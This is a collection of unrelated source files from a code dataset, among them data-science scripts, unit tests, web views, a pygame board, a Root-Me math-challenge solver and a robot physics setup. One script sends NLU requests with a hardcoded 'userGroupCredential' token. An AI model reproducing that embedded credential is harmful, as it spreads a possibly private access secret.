each new policy, going up one level\n\t\t\tnew_policy[\"paragraphs\"].append(new_p)\n\t\t# going up another level\n\t\t# append new policy to the new_data\n\t\tnew_data['data'].append(new_policy)\t\n\t\n\t# close the file\n\tfile.close()\n\n\tc = 0\n\tfor p in new_data[\"data\"]:\n\t\tfor s in p[\"paragraphs\"]:\n\t\t\tfor qas in s[\"qas\"]:\n\t\t\t\tc += 1\n\t\t\t\tif len(qas[\"answers\"]) == 0:\n\t\t\t\t\tprint(\"empty answer!!!!!!\")\n\tprint(c)\n\n\t# dump agumented data to new json file\n\twith open(sys.argv[3], 'w') as outfile:\n\t\tjson.dump(new_data, outfile)\n\n# call main for function to start:\nif __name__ == '__main__':\n\tmain()","sub_path":"agumentation/agumentate_policy.py","file_name":"agumentate_policy.py","file_ext":"py","file_size_in_byte":5070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"215545930","text":"from goods.Good import *\nfrom enums.GoodsType import *\nfrom enums.GoodsColour import *\n\n\nclass Cleaners(Good):\n goods_type = GoodsType.CLEANERS\n goods_colour = GoodsColour.BLUE\n\n def __init__(self, name, price, amount, id, manufacturer, goods_colour, goods_type):\n super().__init__(id, name, manufacturer, price, amount, goods_colour, goods_type)\n self.name = name\n self.price = price\n self.amount = amount\n\n def __str__(self):\n return \"Good type: \" + str(self.goods_type.value) + \" Price: \" + str(self.price) + \" Amount: \" + str(self.amount)\n","sub_path":"Lab4/goods/Cleaners.py","file_name":"Cleaners.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"326107374","text":"import requests\n# s = requests.session()\n# r = s.get(\"http://challenge01.root-me.org/programmation/ch1/\")\n#\n# div = r.text.split(\"\")\n#\n# recupUn1 = div[1].split(\"
    \")[0]\n# recup2Un1 = recupUn1.split(\"=\")[1]\n# recup3Un1 = recup2Un1.replace('','')\n# Un1 = recup3Un1.replace('','').strip()\n# Un1 = Un1.replace('[','(')\n# Un1 = Un1.replace(']',')')\n#\n# recupUn0 = div[1].split(\"
    \")[1]\n# Un0 = recupUn0.split(\"=\")[1].strip()\n#\n# recupIteration = div[1].split(\"
    \")[2]\n# recup2Iteration = recupIteration.split(\"\")[1]\n# iteration = recup2Iteration.split(\"\")[0].strip()\n#\n# p1 = Un1.split(\")\")\n# p1s = p1[0].replace(\"(\",\"\")\n# nombreP1 = p1s.split(\"+\")[0]\n# nombreP1 = nombreP1.strip()\n#\n# p2 = Un1.split(\"(\")[2]\n# p2s = p2.replace(\")\",\"\")\n# nombreP2 = p2s.split(\"*\")[1]\n# nombreP2 = nombreP2.strip()\n#\n# def u(n):\n# U = int(Un0)\n# for i in range (0,n+1):\n# U =(int(nombreP1)+U)-(i*int(nombreP2))\n# #endfor\n# return U\n# #enddef\n# res = u(int(iteration))\n#\n# data = {\"result\":str(res)}\n# reponse = s.get(\"http://challenge01.root-me.org/programmation/ch1/ep1_v.php\", params=data)\n#\n# print(reponse.url)\n# print(reponse.text)\n# print(reponse.cookies)\n#\n# print(r.cookies)\n\ns = requests.session()\nresponse = s.get(\"http://challenge01.root-me.org/programmation/ch1/\")\n\ndiv = response.text.split(\"\")\n\nUn1 = div[1].split(\"
    \")[0].split(\"=\")[1].replace('','').replace('','').strip().replace('[','(').replace(']',')')\nUn0 = div[1].split(\"
    \")[1].split(\"=\")[1].strip()\niteration = div[1].split(\"
    \")[2].split(\"\")[1].split(\"\")[0].strip()\n\nnombreP1 = Un1.split(\")\")[0].replace(\"(\",\"\").split(\"+\")[0].strip()\nnombreP2 = Un1.split(\"(\")[2].replace(\")\",\"\").split(\"*\")[1].strip()\n\ndef u(n):\n U = int(Un0)\n for i in range (0,n):\n U =(int(nombreP1)+U)-(i*int(nombreP2))\n #endfor\n return U\n#enddef\nres = u(int(iteration))\n\nresponse2 = s.get('http://challenge01.root-me.org/programmation/ch1/ep1_v.php?result=' + str(res))\n\nprint(response2.text)","sub_path":"RootMe/Suite Mathematique.py","file_name":"Suite Mathematique.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"268032922","text":"#\n# Copyright (C) 2012 - 2021 Satoru SATOH \n# SPDX-License-Identifier: MIT\n#\n# pylint: disable=missing-docstring\nr\"\"\"Test cases for anyconfig.utils.files.\n\"\"\"\nimport pathlib\nimport tempfile\nimport unittest\n\nimport anyconfig.utils.files as TT\n\nfrom anyconfig.ioinfo import make as ioinfo_make\n\n\nclass TestCase(unittest.TestCase):\n\n def test_get_file_extension(self):\n ies = (\n ('', ''),\n ('/a/b/c', ''),\n ('/a/b/c.txt', 'txt'),\n ('/a/b/c/d.txt.gz', 'gz'),\n )\n for inp, exp in ies:\n self.assertEqual(TT.get_file_extension(inp), exp)\n\n def test_get_path_from_stream(self):\n this = __file__\n\n with pathlib.Path(this).open() as strm:\n self.assertEqual(TT.get_path_from_stream(strm), this)\n\n with self.assertRaises(ValueError):\n TT.get_path_from_stream(this)\n\n self.assertEqual(TT.get_path_from_stream(this, safe=True), '')\n\n def test_split_path_by_marker(self):\n ies = (\n ('a.txt', ('a.txt', '')),\n ('*.txt', ('', '*.txt')),\n ('a/*.txt', ('a', '*.txt')),\n ('a/b/*.txt', ('a/b', '*.txt')),\n ('a/b/*/*.txt', ('a/b', '*/*.txt')),\n )\n for inp, exp in ies:\n self.assertEqual(TT.split_path_by_marker(inp), exp)\n\n def test_expand_paths(self):\n with tempfile.TemporaryDirectory() as workdir:\n tdir = pathlib.Path(str(workdir)) / 'a' / 'b' / 'c'\n tdir.mkdir(parents=True)\n\n pathlib.Path(tdir / 'd.txt').touch()\n pathlib.Path(tdir / 'e.txt').touch()\n pathlib.Path(tdir / 'f.json').write_text(\"{'a': 1}\\n\")\n\n path = tdir / 'd.txt'\n for inp, exp in ((str(path), [path]),\n (path, [path]),\n (ioinfo_make(path), [ioinfo_make(path)]),\n (tdir / '*.txt',\n [tdir / 'd.txt', tdir / 'e.txt']),\n (tdir.parent / '**' / '*.txt',\n [tdir / 'd.txt', tdir / 'e.txt']),\n (tdir.parent / '**' / '*.*',\n [tdir / 'd.txt',\n tdir / 'e.txt',\n tdir / 'f.json']),\n ([tdir / 'e.txt', tdir / 'd.txt'],\n [tdir / 'e.txt', tdir / 'd.txt'])\n ):\n self.assertEqual(\n TT.expand_paths(inp), exp, f'{inp!r} vs. 
{exp!r}'\n )\n\n with path.open() as fobj:\n self.assertEqual(TT.expand_paths(fobj), [fobj])\n\n def test_are_same_file_types(self):\n fun = TT.are_same_file_types\n this_py = pathlib.Path(__file__)\n this = ioinfo_make(this_py)\n other = ioinfo_make(this_py.parent / 'setup.cfg')\n\n for inp, exp in (([], False),\n ([this], True),\n ([this, this], True),\n ([this, other], False),\n ([this, other], False),\n ):\n (self.assertTrue if exp else self.assertFalse)(fun(inp))\n\n# vim:sw=4:ts=4:et:\n","sub_path":"tests/utils/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"545479519","text":"# -*- coding: utf-8 -*-\nfrom pyramid.view import view_config\nimport pyramid.httpexceptions as exc\n\nfrom infolica.exceptions.custom_error import CustomError\nfrom infolica.models import Constant\nfrom infolica.models.models import ControleGeometre, Operateur\nfrom infolica.scripts.utils import Utils\nfrom infolica.scripts.authentication import check_connected\n\n\n@view_config(route_name='controle_geometre_by_affaire_id', request_method='GET', renderer='json')\ndef controle_geometre_by_affaire_id_view(request):\n \"\"\"\n Return controle_geometre by affaire_id\n \"\"\"\n # Check connected\n if not check_connected(request):\n raise exc.HTTPForbidden()\n\n # Get controle mutation id\n affaire_id = request.matchdict['id']\n query = request.dbsession.query(ControleGeometre).filter(\n ControleGeometre.affaire_id == affaire_id).first()\n\n if query is None:\n return None\n \n operateur_prenom_nom = None\n\n \n # get signature_operateur\n if query.operateur_id is not None:\n operateur = request.dbsession.query(\n Operateur\n ).filter(\n Operateur.id == query.operateur_id\n ).first()\n operateur_prenom_nom = ' '.join([operateur.prenom, operateur.nom])\n\n\n ctrl = Utils.serialize_one(query)\n\n ctrl['operateur_prenom_nom'] = operateur_prenom_nom\n\n return ctrl\n\n\n@view_config(route_name='controle_geometre', request_method='POST', renderer='json')\n@view_config(route_name='controle_geometre_s', request_method='POST', renderer='json')\ndef controle_geometre_new_view(request):\n \"\"\"\n Add new controle_geometre\n \"\"\"\n # Check authorization\n if not Utils.has_permission(request, request.registry.settings['affaire_controle_geometre_edition']):\n raise exc.HTTPForbidden()\n\n Utils.addNewRecord(request, ControleGeometre)\n\n return Utils.get_data_save_response(Constant.SUCCESS_SAVE.format(ControleGeometre.__tablename__))\n\n\n@view_config(route_name='controle_geometre', request_method='PUT', renderer='json')\n@view_config(route_name='controle_geometre_s', request_method='PUT', renderer='json')\ndef controle_geometre_update_view(request):\n \"\"\"\n Update controle_geometre\n \"\"\"\n # Check authorization\n if not Utils.has_permission(request, request.registry.settings['affaire_controle_geometre_edition']):\n raise exc.HTTPForbidden()\n\n # Get controle mutation id\n id = request.params['id'] if 'id' in request.params else None\n\n # Get controle mutation record\n record = request.dbsession.query(ControleGeometre).filter(\n ControleGeometre.id == id).first()\n\n if not record:\n raise CustomError(\n CustomError.RECORD_WITH_ID_NOT_FOUND.format(ControleGeometre.__tablename__, id))\n \n record = Utils.set_model_record(record, request.params)\n\n return 
Utils.get_data_save_response(Constant.SUCCESS_SAVE.format(ControleGeometre.__tablename__))\n\n","sub_path":"back/infolica/views/controle_geometre.py","file_name":"controle_geometre.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"138732801","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis script runs the discrete-time version of the Lotka-Volterra model and plots\nthe results in two graphs saved to ../Results.\n\"\"\"\n\n__author__ = 'Group 4'\n__version__ = '0.0.1'\n\n# imports\nimport numpy as np\nimport matplotlib.pylab as p\nimport sys\n\ndef main(r = 1.0, a = 0.1, z = 1.5, e = 0.75):\n \"\"\"\n Calculates the population density at each time step using the discrete-time\n version of the Lotka-Volterra model\n Plots the results in two graphs saved to ../Results/. \n First, a change in resource and consumer density over time, and second, the \n change in population density of consumer with respect to the change in \n population density of resource\n \n Parameters:\n r (float): intrinsic (per-capita) growth rate of the resource \n population (time ^ -1)\n a (float): per-capita \"search rate\" for the resource\n (area x time ^ -1) multiplied by its attack success\n probability, which determines the encounter and \n consumption rate of the consumer on the resource\n z (float): mortality rate (time ^ -1)\n e (float): consumer's efficiency (a fraction) in converting \n resource to consumer biomass\n \"\"\"\n\n # define time vector, integrate from time point 0 to 15, using 1000\n # sub-divisions of time\n # note that units of time are arbitrary here\n t = np.linspace(0, 15, 1000)\n\n # set initial conditions for two populations (10 resources and 5 consumers per \n # unit area), and convert the two into an array (because our dCR_dt function\n # takes an array as input)\n R0 = 10\n C0 = 5\n\n # set K, which is the carrying capacity\n K = 33\n\n # preallocate list\n popu = np.zeros([len(t),2])\n \n # discrete time version of LV model\n for i in range(len(t)): \n # Looping through both columns at the same time\n Rn = R0 * (1 + r * (1- R0/K) - a * C0)\n Cn = C0 * (1 - z + e * a * R0)\n R0 = Rn\n C0 = Cn\n popu[i,:]= [Rn,Cn]\n \n # visualize with matplotlib\n f1 = p.figure()\n p.plot(t, popu[:,0], 'g-', label = \"Resource density\") # plot\n p.plot(t, popu[:,1], 'b-', label = \"Consumer density\")\n p.grid()\n p.legend(loc = \"best\")\n p.xlabel(\"Time\")\n p.ylabel(\"Population density\")\n p.suptitle(\"Consumer-Resource population dynamics\")\n p.title(\"r = %.2f, a = %.2f, z = %.2f, e = %.2f\" %(r, a, z, e),\n fontsize = 8)\n # p.show()\n f1.savefig(\"../Results/LV_model3.pdf\") # save figure\n\n # plot of Consumer density against Resource density\n f2 = p.figure()\n p.plot(popu[:,0], popu[:,1], 'r-')\n p.grid()\n p.xlabel(\"Resource density\")\n p.ylabel(\"Consumer density\")\n p.suptitle(\"Consumer-Resource population dynamics\")\n p.title(\"r = %.2f, a = %.2f, z = %.2f, e = %.2f\" %(r, a, z, e),\n fontsize = 8)\n # p.show()\n f2.savefig(\"../Results/LV_model3-1.pdf\")\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 5:\n # assign sys argvs to parameter values\n r = float(sys.argv[1])\n a = float(sys.argv[2])\n z = float(sys.argv[3])\n e = float(sys.argv[4])\n # K = float(sys.argv[5])\n main(r, a, z, e)\n sys.exit()\n else:\n print(\"Lacking user inputs, using defaults\")\n main()\n 
sys.exit()","sub_path":"Week7/Code/LV3.py","file_name":"LV3.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"374320278","text":"class Car(object):\n\tdef __init__(self, cname=\"General\", cmodel=\"GM\", ctype=None ):\n\t\tself.name = cname\n\t\tself.model = cmodel\n\t\tself.type = ctype\n\t\tself.speed = 0\n\n\t\tif self.name == 'Porshe' or self.name =='Koenigsegg':\n\t\t\tself.num_of_doors = 2\n\t\telse:\n\t\t\tself.num_of_doors = 4\n\n\t\tif self.type == 'trailer':\n\t\t\tself.num_of_wheels = 8\n\t\telse:\n\t\t\tself.num_of_wheels = 4\n\n\n\tdef is_saloon(self):\n\t\tif self.type != 'trailer':\n\t\t\tself.type = 'saloon'\n\t\t\treturn True\n\t\treturn False\n\n\tdef drive(self,curspeed):\n\t\tif curspeed == 7:\n\t\t\tself.speed = 77\n\t\telif curspeed == 3:\n\t\t\tself.speed = 1000\n\n\t\treturn self\n\n\n\t\t","sub_path":"carclass.py","file_name":"carclass.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"383629878","text":"from common.http_request_new import Request\nfrom common.m_process import mprocess\nimport json\npath=\"D:\\\\Users\\\\lijq36\\\\Desktop\\\\2\"\nresult_path=\"E:\\\\test\\\\Result.txt\"\n\n\n\ndef nlu(each):\n url = \"https://nlu.sit.aimidea.cn:22012/nlu/v1\"\n data = {\"currentUtterance\": \"这款空调有什么特色\", \"sourceDevice\": \"空调\", \"multiDialog\": \"false\", \"slotMiss\": \"false\",\n \"suites\": [\"default\"], \"deviceId\": \"3141482994683870\", \"userGroup\": \"meiju\",\n \"userGroupCredential\": \"b82063f4-d39b-4940-91c3-5b67d741b4d3\"}\n data[\"currentUtterance\"] = each\n result = Request().requests(url, data, 'post')\n result = result.json()\n classifier = result['classifier']\n if classifier != \"publicDomain\":\n print(each + \":\"+classifier)\n with open(result_path, 'a', encoding='utf8') as f:\n f.write(each+\":\"+str(result)+'\\n')\n # f.close()\n else:\n print(each + \":\"+classifier)\n\n\nif __name__==\"__main__\":\n path1 = \"D:\\\\Users\\\\lijq36\\\\Desktop\\\\2\"\n with open(path1, 'r', encoding='utf8') as f:\n a = f.readlines()\n for i in range(len(a)):\n nlu(a[i].replace(\"\\n\",\"\"))\n # mprocess(nlu, a,Poolnum=1)\n\n #\n","sub_path":"AITEST/demo/demo4.py","file_name":"demo4.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"618449578","text":"import sys\nimport pygame\n\nclass GraphicsHandler:\n\n\t_bg_color = (255, 255, 255)\n\tblack = (0, 0, 0)\n\tscreen = None\n\n\t@staticmethod\n\tdef initialize_board(_type = 1):\n\n\t\t#pygame.init()\n\t\t#GraphicsHandler.screen = pygame.display.set_mode(size)\n\t\tGraphicsHandler.screen.fill(GraphicsHandler._bg_color)\n\t\tif _type == 1:\n\t\t\tpygame.draw.line(GraphicsHandler.screen, GraphicsHandler.black, [200,50], [200,550], 5)\n\t\t\tpygame.draw.line(GraphicsHandler.screen, GraphicsHandler.black, [400,50], [400,550], 5)\n\t\t\tpygame.draw.line(GraphicsHandler.screen, GraphicsHandler.black, [50,200], [550,200], 5)\n\t\t\tpygame.draw.line(GraphicsHandler.screen, GraphicsHandler.black, [50,400], [550,400], 5)\n\n\t\tpygame.display.flip()\n\n\t@staticmethod\n\tdef initialize_game(size = [600, 600]):\n\t\tpygame.init()\n\t\tGraphicsHandler.screen = pygame.display.set_mode(size)\n\t\tGraphicsHandler.screen.fill(GraphicsHandler._bg_color)\n\t\tfont = pygame.font.Font(None, 35)\n\t\ttext_title = font.render(\"TIC TAC 
TOE\", 5, GraphicsHandler.black)\n\t\ttitle = GraphicsHandler.screen.blit(text_title, (200,100))\n\t\tpygame.display.flip()\n\n\t\trunning = True\n\n\t\twhile running:\n\t\t\tevent = pygame.event.poll()\n\t\t\tif event.type == pygame.QUIT: \n\t\t\t\tsys.exit()\n\t\t\telif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n\t\t\t\tmouse_pos = pygame.mouse.get_pos()\n\t\t\t\tif title.collidepoint(mouse_pos):\n\t\t\t\t\tGraphicsHandler.initialize_board()\n\t\t\t\t\trunning = False\n\n\n","sub_path":"graphicshandler.py","file_name":"graphicshandler.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"516749733","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 26 09:30:52 2017\n\n@author: jack.gang\n\"\"\"\n\nimport pandas as pd\nfrom patsy import dmatrices\nimport numpy as np\nimport csv\n#from sklearn.cluster import KMeans\n\npath = 'train.csv'\npathUniv = open(path)\ntrain = pd.read_csv(pathUniv, sep=',', engine='python')\npathUniv.close()\n\n# clean up data\n#meanAge = np.nanmean(train['Age'])\n\nfor index, row in train.iterrows():\n# if row['Age'] != row['Age']:\n# train.set_value(index, 'Age', meanAge)\n \n if row['Age'] < 16 or row['Age'] > 75:\n train.set_value(index, 'Age', 1)\n else:\n train.set_value(index, 'Age', 0)\n \n# if row['Parch'] > 0:\n# train.set_value(index, 'Age', 0)\n# if row['SibSp'] > 0:\n# train.set_value(index, 'SibSp', 1)\n# if row['Parch'] > 0:\n# train.set_value(index, 'Parch', 1)\n\n# model\noutcome, predictors = dmatrices(\"Survived ~ C(Pclass)-1 + C(Sex) + C(Age) + SibSp + Parch + C(Embarked) + Fare\", train)\n\nbetas = np.linalg.lstsq(predictors, outcome)[0].ravel()\nbetaDict = {}\nfor name, beta in zip(predictors.design_info.column_names, betas):\n betaDict[name] = beta\n\n# training\nfor index, row in train.iterrows():\n \n estimate = row['SibSp']*betaDict['SibSp'] + row['Parch']*betaDict['Parch'] + row['Fare']*betaDict['Fare']\n \n if row['Age'] == 1:\n estimate += betaDict['C(Age)[T.1.0]']\n \n if row['Sex'] == 'male':\n estimate += betaDict['C(Sex)[T.male]']\n \n if row['Pclass'] == 1:\n estimate += betaDict['C(Pclass)[1]']\n elif row['Pclass'] == 2:\n estimate += betaDict['C(Pclass)[2]']\n else:\n estimate += betaDict['C(Pclass)[3]']\n \n if row['Embarked'] == 'Q':\n estimate += betaDict['C(Embarked)[T.Q]']\n elif row['Embarked'] == 'S':\n estimate += betaDict['C(Embarked)[T.S]']\n \n train.set_value(index, 'estimate', min(1, round(estimate)))\n\nprint(\"training:\", (len(train) - sum(abs(train['Survived'] - train['estimate']))) / len(train))\n\n# test\n#path = 'test.csv'\n#pathUniv = open(path)\n#test = pd.read_csv(pathUniv, sep=',', engine='python')\n#pathUniv.close()\n#\n#for index, row in test.iterrows():\n# \n# estimate = row['Age']*betaDict['Age'] + row['SibSp']*betaDict['SibSp'] + row['Parch']*betaDict['Parch'] + row['Fare']*betaDict['Fare']\n# \n# if row['Sex'] == 'male':\n# estimate += betaDict['C(Sex)[T.male]']\n# \n# if row['Pclass'] == 1:\n# estimate += betaDict['C(Pclass)[1]']\n# elif row['Pclass'] == 2:\n# estimate += betaDict['C(Pclass)[2]']\n# else:\n# estimate += betaDict['C(Pclass)[3]']\n# \n# if row['Embarked'] == 'Q':\n# estimate += betaDict['C(Embarked)[T.Q]']\n# elif row['Embarked'] == 'S':\n# estimate += betaDict['C(Embarked)[T.S]']\n# \n# test.set_value(index, 'Survived', min(1, round(estimate)))\n#\n#test['Survived'] = test['Survived'].astype(int)\n#test[['PassengerId','Survived']].to_csv(\"result2.csv\", header = 
['PassengerId','Survived'], index = False, quoting = csv.QUOTE_NONE, quotechar = '')\n","sub_path":"Titanic/Titanic.py","file_name":"Titanic.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"231931442","text":"#python imports.\nimport requests\n\n# django imports.\nfrom django.conf import settings\n\n#app level imports.\nfrom .exceptions import NetworkException\n\nURL = settings.LOCATIONIQ_URL\n\ndef getlatlon(address, key, url=URL):\n\t\"\"\"\n\tThis function is used to get the latitude and longitude address.\n\t\"\"\"\n\tPARAMS = {}\n\tPARAMS['key'] = key\n\tPARAMS['q'] = address\n\n\ttry: \n\t\tresponse = requests.get(url=url, params=PARAMS)\n\t\tif response.status_code == 200:\n\t\t\tdata = response.json()\n\t\t\tlat = data[0]['lat'] \n\t\t\tlon = data[0]['lon']\n\t\t\treturn lat, lon\n\n\texcept Exception as e:\n\t\tprint(str(e))\n\t\traise NetworkException(errors=str(e))\n\t\t\n\treturn 0, 0\n\n\n\n\n\n\n\n\n\n\n","sub_path":"geographic/libs/locationiq.py","file_name":"locationiq.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"34400061","text":"import aiger_bv as BV\n\nimport aiger_coins as C\n\n\ndef test_pcirc_smoke():\n x = BV.uatom(3, 'x')\n y = BV.uatom(3, 'y')\n z = (x + y).with_output('z')\n\n pcirc = C.PCirc(circ=z, dist_map={'y': lambda _: 1/3}) \\\n .assume(y <= 2)\n\n rvar = C.RandomVarCirc(pcirc)\n\n # Warning. May be flaky.\n for i in range(3):\n assert 3 <= rvar({'x': 3}) <= 5\n\n\ndef test_pcirc_relabel():\n x = BV.uatom(3, 'x')\n pcirc = C.PCirc(circ=x, dist_map={'x': lambda _: 1/3})\n pcirc2 = pcirc['i', {'x': 'y'}]\n assert pcirc2.inputs == set()\n assert pcirc2.circ.inputs == {'y'}\n assert pcirc2.dist_map['y'](0) == 1/3\n\n\ndef test_seq_compose():\n x = BV.uatom(3, 'x').with_output('y')\n y = BV.uatom(3, 'y').with_output('y')\n pcirc = C.PCirc(circ=y)\n pcirc2 = C.PCirc(circ=x, dist_map={'x': lambda _: 1/3}) >> pcirc\n pcirc3 = pcirc << C.PCirc(circ=x, dist_map={'x': lambda _: 1/3})\n\n assert pcirc2.outputs == pcirc3.outputs == {'y'}\n assert pcirc2.inputs == pcirc3.inputs == set()\n assert pcirc2.dist_map['x'](0) == pcirc3.dist_map['x'](0) == 1/3\n\n assert 0 <= pcirc2({})[0]['y'] <= 7\n\n pcirc4 = C.PCirc(circ=(x + 1).with_output('y')) >> pcirc\n assert pcirc4({'x': 0})[0] == {'y': 1}\n\n\ndef test_par_compose():\n x = BV.uatom(3, 'x').with_output('x')\n y = BV.uatom(3, 'y').with_output('y')\n\n pcirc_x = C.PCirc(circ=x)\n pcirc_y = C.PCirc(circ=y, dist_map={'y': lambda _: 1/3})\n\n pcirc_xy = pcirc_x | pcirc_y\n assert pcirc_xy.inputs == {'x'}\n assert pcirc_xy.outputs == {'x', 'y'}\n assert pcirc_xy.dist_map['y'](0) == 1/3\n\n\ndef test_loopback_unroll():\n x = BV.uatom(3, 'x')\n y = BV.uatom(3, 'y')\n adder = (x + y).with_output('z')\n\n pcirc = C.PCirc(adder, dist_map={'y': lambda _: 1/3}) \\\n .assume((y > 0) & (y < 4))\n\n pcirc2 = pcirc.loopback({\n 'input': 'x',\n 'output': 'z',\n 'init': 4,\n 'keep_output': True,\n })\n\n assert pcirc2.inputs == set()\n assert pcirc2.outputs == {'z'}\n assert len(pcirc2.latches) == 1\n assert 4 < pcirc2({})[0]['z'] < 8\n\n pcirc3 = pcirc2.unroll(3)\n assert pcirc3.inputs == set()\n assert pcirc3.outputs == {'z##time_1', 'z##time_2', 'z##time_3'}\n\n pcirc4 = pcirc2.unroll(3, only_last_outputs=True)\n assert pcirc4.outputs == {'z##time_3'}\n pcirc4({}) # Could technically be any value due to roll 
back.\n","sub_path":"tests/test_pcirc.py","file_name":"test_pcirc.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"419485740","text":"from unittest import TestCase\n\nimport pandas as pd\n\nfrom pycta.performance.periods import periods, period_returns\nfrom test.config import read_series\n\n\n\nimport pandas.util.testing as pdt\n\nclass TestPeriods(TestCase):\n def test_periods(self):\n p = periods(today=pd.Timestamp(\"2015-05-01\"))\n self.assertEqual(p[\"Two weeks\"].start, pd.Timestamp(\"2015-04-17\"))\n self.assertEqual(p[\"Two weeks\"].end, pd.Timestamp(\"2015-05-01\"))\n\n def test_period_returns(self):\n p = periods(today=pd.Timestamp(\"2015-05-01\"))\n s = read_series(\"ts.csv\", parse_dates=True).pct_change().dropna()\n x = 100*period_returns(returns=s, offset=p)\n self.assertAlmostEqual(x[\"Three Years\"], 1.1645579858904798 , places=10)\n\n def test_periods_more(self):\n s = read_series(\"ts.csv\", parse_dates=True).pct_change().dropna()\n y = period_returns(s, offset=periods(today=s.index[-1]))\n pdt.assert_series_equal(y, read_series(\"periods.csv\", parse_dates=False), check_names=False)\n","sub_path":"test/test_performance/test_periods.py","file_name":"test_periods.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"448223423","text":"import sys\r\nimport random\r\nimport subprocess\r\n#import pygame\r\n#from pygame.locals import *\r\nimport pymunk\r\nimport math\r\nfrom entities import *\r\nfrom shapes import *\r\nfrom network import *\r\nfrom gnarl import *\r\nfrom functools import partial\r\n\r\nWINDOW_SIZE = (1100,600)\r\n\r\ndef init_terrain():\r\n terrain = Terrain()\r\n terrain.add_segment(WINDOW_SIZE[1]-10, math.radians(-90))\r\n terrain.add_segment(300, math.radians(0))\r\n terrain.add_segment(100, math.radians(5))\r\n terrain.add_segment(100, math.radians(10))\r\n terrain.add_segment(100, math.radians(15))\r\n terrain.add_segment(100, math.radians(10))\r\n terrain.add_segment(100, math.radians(5))\r\n terrain.add_segment(300, math.radians(0))\r\n terrain.add_segment(WINDOW_SIZE[1], math.radians(90)) \r\n terrain.rasterize((2, WINDOW_SIZE[1]))\r\n return terrain\r\n\r\ndef init_robot():\r\n shape = create_box((30, 30))\r\n shape.body.position = (0, 0)\r\n #shape.color = pygame.color.THECOLORS[\"blue\"]\r\n trunk = Bone(shape)\r\n\r\n shape = create_box((30, 40))\r\n shape.body.position = (0, -25)\r\n #shape.color = pygame.color.THECOLORS[\"green\"]\r\n thigh1 = Bone(shape)\r\n\r\n shape = create_box((30, 40))\r\n shape.body.position = (0, -25)\r\n #shape.color = pygame.color.THECOLORS[\"green\"]\r\n thigh2 = Bone(shape)\r\n\r\n shape = create_box((20, 50))\r\n shape.body.position = (0, -45)\r\n #shape.color = pygame.color.THECOLORS[\"green\"]\r\n leg1 = Bone(shape)\r\n\r\n shape = create_box((20, 50))\r\n shape.body.position = (0, -45)\r\n #shape.color = pygame.color.THECOLORS[\"green\"]\r\n leg2 = Bone(shape)\r\n\r\n shape = create_box((44, 10))\r\n shape.body.position = (12, -60)\r\n #shape.color = pygame.color.THECOLORS[\"red\"]\r\n foot1 = Bone(shape)\r\n\r\n shape = create_box((44, 10))\r\n shape.body.position = (12, -60)\r\n #shape.color = pygame.color.THECOLORS[\"red\"]\r\n foot2 = Bone(shape)\r\n \r\n hip1 = trunk.join(thigh1, (0, -10), (0, 15))\r\n hip2 = trunk.join(thigh2, (0, -10), (0, 15))\r\n knee1 = thigh1.join(leg1, (0, -15), (0, 20))\r\n knee2 = 
thigh2.join(leg2, (0, -15), (0, 20))\r\n ankle1 = leg1.join(foot1, (-5, -20), (-17, 0))\r\n ankle2 = leg2.join(foot2, (-5, -20), (-17, 0))\r\n\r\n robot = Robot()\r\n \r\n robot.add_bone(trunk)\r\n robot.add_bone(thigh1)\r\n robot.add_bone(thigh2)\r\n robot.add_bone(leg1)\r\n robot.add_bone(leg2)\r\n robot.add_bone(foot1)\r\n robot.add_bone(foot2)\r\n \r\n robot.add_joint(hip1)\r\n robot.add_joint(hip2)\r\n robot.add_joint(knee1)\r\n robot.add_joint(knee2)\r\n robot.add_joint(ankle1)\r\n robot.add_joint(ankle2)\r\n \r\n return robot\r\n\r\ndef _init_robot():\r\n shape = create_box((30, 20))\r\n shape.body.position = (0, 0)\r\n #shape.color = pygame.color.THECOLORS[\"blue\"]\r\n trunk = Bone(shape)\r\n\r\n shape = create_box((10, 70))\r\n shape.body.position = (-10, -35)\r\n #shape.color = pygame.color.THECOLORS[\"blue\"]\r\n leg1 = Bone(shape)\r\n\r\n shape = create_box((10, 70))\r\n shape.body.position = (10, -35)\r\n #shape.color = pygame.color.THECOLORS[\"blue\"]\r\n leg2 = Bone(shape)\r\n \r\n hip1 = trunk.join(leg1, (-10, -5), (0, 30))\r\n hip2 = trunk.join(leg2, (10, -5), (0, 30))\r\n \r\n robot = Robot()\r\n \r\n robot.add_bone(trunk)\r\n robot.add_bone(leg1)\r\n robot.add_bone(leg2)\r\n \r\n robot.add_joint(hip1)\r\n robot.add_joint(hip2)\r\n \r\n return robot\r\n\r\ndef init_population(robot, num):\r\n 